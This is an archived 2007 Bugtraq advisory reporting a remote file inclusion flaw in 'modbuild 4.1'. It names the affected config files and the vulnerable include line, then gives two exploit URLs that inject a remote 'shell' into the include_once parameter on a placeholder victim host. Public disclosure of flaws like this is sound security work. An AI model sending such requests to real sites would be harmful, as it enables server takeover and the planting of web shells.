modbuild >> 4.1 Remote File Inclusion

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: modbuild >> 4.1 Remote File Inclusion
From: s433d_only_linux@xxxxxxxx
Date: 25 Apr 2007 22:40:16 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

####################################################
modbuild  >>    4.1     Remote File Inclusion
####################################################
Affected Software .:    
Download..: 
Risk ..............: high 
Date .........: 26/4/2007 
Found by ..........: s433d_only_linux 
Contact ...........: s433d_only_linux@xxxxxxxx 
Web .............: Www.hackerz.ir 
special thanx ........... B4h4r3h_ir my best friend :x & ali jasbi
####################################################

####################################################
Affected File:
oneadmin/config-bak.php include_once($path["docroot"]."common/include.php"); 
oneadmin/config.php include_once($path["docroot"]."common/include.php"); 
####################################################
Exploit:
http://victim.com/oneadmin/config-bak.php?include_once=shell?
http://victim.com/oneadmin/config.php?include_once=shell?
####################################################

Prev by Date: [ MDKSA-2007:094 ] - Updated postgresql packages fix vulnerability
Next by Date: Re: WordPress v2.1.3 >> remote file include~
Previous by thread: [ MDKSA-2007:094 ] - Updated postgresql packages fix vulnerability
Next by thread: SineCMS
Index(es):
- Date
- Thread